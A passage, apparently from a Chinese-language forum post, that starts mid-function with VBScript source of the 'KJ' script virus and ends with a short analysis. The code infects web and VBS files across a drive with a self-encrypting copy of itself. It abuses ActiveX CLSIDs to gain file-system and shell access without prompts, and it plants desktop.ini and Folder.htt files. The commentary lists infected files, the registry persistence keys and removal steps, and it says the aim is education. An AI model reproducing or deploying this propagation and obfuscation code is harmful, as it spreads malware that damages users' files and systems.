  Set  DicSub  =  CreateObject("Scripting.Dictionary") 
  Set  Folders  =  ThisFolder.SubFolders 
  FolderCount  =  0 
  For  Each  TempFolder  in  Folders 
  FolderCount  =  FolderCount  +  1 
  DicSub.add  FolderCount,  TempFolder.Name 
  Next 
  If  DicSub.Count  =  0  Then 
  LastIndexChar  =  InstrRev(CurrentString,"\",Len(CurrentString)-1) 
  SubString  =  Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) 
  CurrentString  =  KJChangeSub(CurrentString,LastIndexChar) 
  SubE  =  1 
  Else 
  If  SubE  =  0  Then 
  CurrentString  =  CurrentString  &  DicSub.Item(1)  &  "\" 
  Exit  Do 
  Else 
  j  =  0 
  For  j  =  1  To  FolderCount 
  If  LCase(SubString)  =  LCase(DicSub.Item(j))  Then 
  If  j  <  FolderCount  Then 
  CurrentString  =  CurrentString  &  DicSub.Item(j+1)  &  "\" 
  Exit  Do 
  End  If 
  End  If 
  Next 
  LastIndexChar  =  InstrRev(CurrentString,"\",Len(CurrentString)-1) 
  SubString  =  Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) 
  CurrentString  =  KJChangeSub(CurrentString,LastIndexChar) 
  End  If 
  End  If 
  Loop 
  KJOboSub  =  CurrentString 
  End  Function 
   
  Function  KJPropagate() 
  On  Error  Resume  Next 
  RegPathValue  =  "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook  Express\Degree" 
  DiskDegree  =  WsShell.RegRead(RegPathValue) 
  If  DiskDegree  =  ""  Then 
  DiskDegree  =  FinalyDisk  &  ":\" 
  End  If 
  For  i=1  to  5 
  DiskDegree  =  KJOboSub(DiskDegree) 
  KJummageFolder(DiskDegree) 
  Next 
  WsShell.RegWrite  RegPathValue,DiskDegree 
  End  Function 
   
  Function  KJummageFolder(PathName) 
  On  Error  Resume  Next 
  Set  FolderName  =  FSO.GetFolder(PathName) 
  Set  ThisFiles  =  FolderName.Files 
  HttExists  =  0 
  For  Each  ThisFile  In  ThisFiles 
  FileExt  =  UCase(FSO.GetExtensionName(ThisFile.Path)) 
  If  FileExt  =  "HTM"  Or  FileExt  =  "HTML"  Or  FileExt  =  "ASP"  Or  FileExt  =  "PHP"  Or  FileExt  =  "JSP"  Then 
  Call  KJAppendTo(ThisFile.Path,"html") 
  ElseIf  FileExt  =  "VBS"  Then 
  Call  KJAppendTo(ThisFile.Path,"vbs") 
  ElseIf  FileExt  =  "HTT"  Then 
  HttExists  =  1 
  End  If 
  Next 
  If  (UCase(PathName)  =  UCase(WinPath  &  "Desktop\"))  Or  (UCase(PathName)  =  UCase(WinPath  &  "Desktop"))Then 
  HttExists  =  1 
  End  If 
  If  HttExists  =  0  Then 
  FSO.CopyFile  WinPath  &  "system32\desktop.ini",PathName 
  FSO.CopyFile  WinPath  &  "web\Folder.htt",PathName 
  End  If 
  End  Function 
   
  Function  KJSetDim() 
  On  Error  Resume  Next 
  Err.Clear 
  TestIt  =  WScript.ScriptFullname 
  If  Err  Then 
  InWhere  =  "html" 
  Else 
  InWhere  =  "vbs" 
  End  If 
  If  InWhere  =  "vbs"  Then 
  Set  FSO  =  CreateObject("Scripting.FileSystemObject") 
  Set  WsShell  =  CreateObject("WScript.Shell") 
  Else 
  Set  AppleObject  =  document.applets("KJ_guest") 
  AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 
  AppleObject.createInstance() 
  Set  WsShell  =  AppleObject.GetObject() 
  AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") 
  AppleObject.createInstance() 
  Set  FSO  =  AppleObject.GetObject() 
  End  If 
  Set  DiskObject  =  FSO.Drives 
  For  Each  DiskTemp  In  DiskObject 
  If  DiskTemp.DriveType  <>  2  And  DiskTemp.DriveType  <>  1  Then 
  Exit  For 
  End  If 
  FinalyDisk  =  DiskTemp.DriveLetter 
  Next 
  Dim  OtherArr(3) 
  Randomize 
  For  i=0  To  3 
  OtherArr(i)  =  Int((9  *  Rnd)) 
  Next 
  TempString  =  "" 
  For  i=1  To  Len(ThisText) 
  TempNum  =  Asc(Mid(ThisText,i,1)) 
  If  TempNum  =  13  Then 
  TempNum  =  28 
  ElseIf  TempNum  =  10  Then 
  TempNum  =  29 
  End  If 
  TempChar  =  Chr(TempNum  -  OtherArr(i  Mod  4)) 
  If  TempChar  =  Chr(34)  Then 
  TempChar  =  Chr(18) 
  End  If 
  TempString  =  TempString  &  TempChar 
  Next 
  UnLockStr  =  "Execute(""Dim  KeyArr(3),ThisText""&vbCrLf&""KeyArr(0)  =  "  &  OtherArr(0)  &  """&vbCrLf&""KeyArr(1)  =  "  &  OtherArr(1)  &  """&vbCrLf&""KeyArr(2)  =  "  &  OtherArr(2)  &  """&vbCrLf&""KeyArr(3)  =  "  &  OtherArr(3)  &  """&vbCrLf&""For  i=1  To  Len(ExeString)""&vbCrLf&""TempNum  =  Asc(Mid(ExeString,i,1))""&vbCrLf&""If  TempNum  =  18  Then""&vbCrLf&""TempNum  =  34""&vbCrLf&""End  If""&vbCrLf&""TempChar  =  Chr(TempNum  +  KeyArr(i  Mod  4))""&vbCrLf&""If  TempChar  =  Chr(28)  Then""&vbCrLf&""TempChar  =  vbCr""&vbCrLf&""ElseIf  TempChar  =  Chr(29)  Then""&vbCrLf&""TempChar  =  vbLf""&vbCrLf&""End  If""&vbCrLf&""ThisText  =  ThisText  &  TempChar""&vbCrLf&""Next"")"  &  vbCrLf  &  "Execute(ThisText)" 
  ThisText  =  "ExeString  =  """  &  TempString  &  """" 
  HtmlText  ="<"  &  "script  language=vbscript>"  &  vbCrLf  &  "document.write  "  &  """"  &  "<"  &  "div  style='position:absolute;  left:0px;  top:0px;  width:0px;  height:0px;  z-index:28;  visibility:  hidden'>"  &  "<""&"""  &  "APPLET  NAME=KJ""&""_guest  HEIGHT=0  WIDTH=0  code=com.ms.""&""activeX.Active""&""XComponent>"  &  "<"  &  "/APPLET>"  &  "<"  &  "/div>"""  &  vbCrLf  &  "<"  &  "/script>"  &  vbCrLf  &  "<"  &  "script  language=vbscript>"  &  vbCrLf  &  ThisText  &  vbCrLf  &  UnLockStr  &  vbCrLf  &  "<"  &  "/script>"  &  vbCrLf  &  "<"  &  "/BODY>"  &  vbCrLf  &  "<"  &  "/HTML>" 
  VbsText  =  ThisText  &  vbCrLf  &  UnLockStr  &  vbCrLf  &  "KJ_start()" 
  WinPath  =  FSO.GetSpecialFolder(0)  &  "\" 
  If  (FSO.FileExists(WinPath  &  "web\Folder.htt"))  Then 
  FSO.CopyFile  WinPath  &  "web\Folder.htt",WinPath  &  "web\kjwall.gif" 
  End  If 
  If  (FSO.FileExists(WinPath  &  "system32\desktop.ini"))  Then 
  FSO.CopyFile  WinPath  &  "system32\desktop.ini",WinPath  &  "system32\kjwall.gif" 
  End  If 
  End  Function

你分析一下病毒代码就可以发现: 
   
  感染的文件 
  web\kjwall.gif(新增) 
  system32\kjwall.gif(新增) 
  SYSTEM\Kernel.dll(新增) 
  Program  Files\Common  Files\Microsoft  Shared\Stationery\blank.htm 
  包含<BODY  onload="vbscript:KJ_start()">的所有.htt,html,asp,php,vbs文件 
  注册表 
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32" 
  "HKEY_CLASSES_ROOT\.dll\Content  Type","application/x-msdownload" 
  "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript" 
  "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath  &  TempPath  &  "WScript.exe  ""%1""  %*" 
  "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}" 
  "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}" 
  关键是把感染文件和run键中的kernel.dll去掉就没有问题 
   
  这本来是一个htm模版文件..本来也没什么危害.. 
  可是由于它工作在local  computer的安全上下文,所以对于filesystemobject,wscript的访问就不会出现不安全提示了(放病毒软件的脚本阻塞除外) 
   
  这个病毒很怪..除了系统盘几个用来寄生的文件外.. 
  它只感染最后一个盘符 


文件夹若有空格，她就感染不了。 
   
  杀这个都norton轻松搞定，去年5月我们所有的机子都有，下了个病毒包就搞定了。



在这里贴的目的不是为了告诉大家这个可以用norton搞定.. 
  而是在让大家知道..脚本病毒是个什么原理,利用的是什么漏洞!!